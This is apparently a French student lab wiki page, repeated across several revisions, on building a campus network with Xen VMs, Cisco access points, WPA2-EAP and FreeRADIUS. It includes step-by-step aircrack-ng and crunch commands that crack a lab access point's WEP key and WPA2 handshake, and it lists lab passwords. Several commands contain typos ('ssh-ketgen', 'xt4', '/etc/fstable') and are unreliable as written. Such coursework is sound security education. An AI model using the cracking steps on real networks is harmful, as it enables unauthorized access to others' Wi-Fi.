11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T10:58:18Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

---------Lorsqu'on essaie de se connecter sur le SSID, il nous est impossible.
En effet, il faut

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T09:47:24Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T09:29:59Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

